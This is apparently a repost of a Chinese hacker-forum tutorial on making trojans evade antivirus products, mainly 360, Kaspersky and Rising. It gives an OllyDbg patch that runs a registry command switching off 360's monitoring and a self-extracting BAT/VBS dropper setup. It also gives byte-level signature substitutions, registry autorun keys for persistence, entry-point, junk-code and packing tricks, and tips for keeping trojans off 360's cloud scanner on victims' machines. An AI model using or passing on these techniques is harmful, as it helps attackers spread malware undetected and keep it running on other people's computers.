`

在一黑客论坛上看见的:360免杀技术介绍

 
阅读更多

一、ASM汇编
这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址,假设为401180。
再找一个小空段,记下地址,假设为40116A
写入:
Push 401180 (也就是那个改动的地址)
Call WinExec
Jmp 原程序入口点(在OD右边)

二、BAT+VBS+RAR
BAT代码如下:


然后用WINRAR建立自解压文件
路径:c:\windows
解压后运行:vbs文件名.vbs
安静模式:全部隐藏
覆盖方式:覆盖所有文件
做完即可。

 

搞定云查杀的实用小技巧
最近在研究360云查杀认为有几点是必须要注意的,拿出来跟大家分享。
1、做免杀时一定要关闭自己杀软的上传可疑文件选项;
2、避免自启动(包括服务启动和注册表启动);
3、不要在小鸡的桌面、windows目录下、system32目录下执行木马,否则360无条件上传exe文件。不到五分钟即会被更新到病毒库,立即查杀。
以上三点注意到了,估计云查杀就没问题了。

 

可通用的批量免杀代码
免杀代码替换方法的小结:
MOV-CMP(有时候可以替换)
MOV EAX,7-SUB EAX,7
ADD-ADC(有时候可以替换)
SUB-SBB(有时候可以替换)
TEST-AND
XOR-OR
OR-XOR
LEA-SUB
CMP-SUB
xor eax,eax
xor eax,eax
改成
xor eax,eax
or eax,eax
有时候可以批量替换
在C32里面搜索33 c0 33 c0
替换成33 c0 09 c0
全部替换有时候都不会出问题.而且免杀效果也还可以.
Test eax,eax
JE XXXXXXXXX
改成
AND EAX,EAX
JE XXXXXXXXX
有时候也可以批量替换
把85 C0 74替换成 21 C0 74
在网上看到的.说pop等价于push
我也试过 貌似每次改都会出错的..
不过你们想试 也可以试试看的.也许什么时候能用哦 哈哈哈..


主动防御怎么过?
过主动防御的方法:
 1.cmd运行前执行的程序(被动启动)
  HKEY_CURRENT_USERSoftwareMicrosoftCommand Processor
  AutoRun REG_SZ "xxx.exe"
  2.session manager(自启动)
  HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSession Manager
  HKEY_LOCAL_MACHINESYSTEMControlSet002ControlSession Manager
  HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession Manager
  BootExecute REG_MULIT_SZ "autocheck autochk * xxx"
  瑞星就来了一个bsmain,用来开机查毒
  不过xxx.exe必须用Native API,不能用Win32API
  3.屏幕保护程序(被动启动)
  HKEY_USERS.DEFAULTControl PanelDesktop
  SCRNSAVE.EXE REG_SZ "xxx.scr"
  其实屏幕保护程序scr文件就是PE文件
  4.
  HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpolicies
  HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesRun
  "MSCONFIG"="%SystemRoot%xxx.exe"
  ——还有很多注册表项更改后,可以实现自启动,这里先写这几个,其他的去要测试.
  另外,还有一个偷换控制面板文件来被动启动的方式,控制面板文件在C:windowssystem32下
  的.cpl文件,这个文件类似与dll文件.方法给大家了,至于怎么利用,大家就各显神通吧!

木马免杀技术归总

一.入口点加1免杀法:
1.用到工具PEditor
2.特点:非常简单实用,但有时还会被卡巴查杀
3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可
二.变化入口地址免杀法:
1.用到工具:OllyDbg,PEditor
2.特点:操作也比较容易,而且免杀效果比入口点加1点要佳.
3.操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第三句继续执行.最后用PEditor把入口点改成零区域的地址.
三.加花指令法免杀法:
1.用到工具:OllyDbg,PEditor
2.特点:免杀通用性非常好,加了花指令后,就基本达到大量杀毒软件的免杀.
3.操作要点:用OD打开无壳的木马程序,找到零区域,把我们准备好的花指令填进去填好后又跳回到入口点,保存好后,再用PEditor把入口点改成零区域处填入花指令的着地址.
四.加壳或加伪装壳免杀法:
1.用到工具:一些冷门壳,或加伪装壳的工具,比如木马彩衣等.
2.特点:操作简单化,但免杀的时间不长,可能很快被杀,也很难躲过卡巴的追杀
3.操作要点:为了达到更好的免杀效果可采用多重加壳,或加了壳后在加伪装壳的免杀效果更佳
五.打乱壳的头文件或壳中加花免杀法:
1.用到工具:秘密行动 ,UPX加壳工具.
2.特点:操作也是傻瓜化,免杀效果也正当不错,特别对卡巴的免杀效果非常好
3.操作要点:首先一定要把没加过壳的木马程序用UPX加层壳,然后用秘密行动这款工具中的SCramble功能进行把UPX壳的头文件打乱,从而达到免杀效果.
六.修改文件特征码免杀法:
1.用到工具:特征码定位器,OllyDbg
2.特点:操作较复杂,要定位修改一系列过程,而且只针对每种杀毒软件的免杀,要达到多种杀毒软件的免杀,必需修改各种杀毒软件的特征码.但免杀效果好
操作要点:对某种杀毒软件的特征码的定位到修改一系列慢长过程.

 

感谢反馈,我们会进一步核实
另外您那的限制条件下运行此木马,估计传播就不会那么快了

 

 

 

 

 

分享到:
评论

相关推荐

Global site tag (gtag.js) - Google Analytics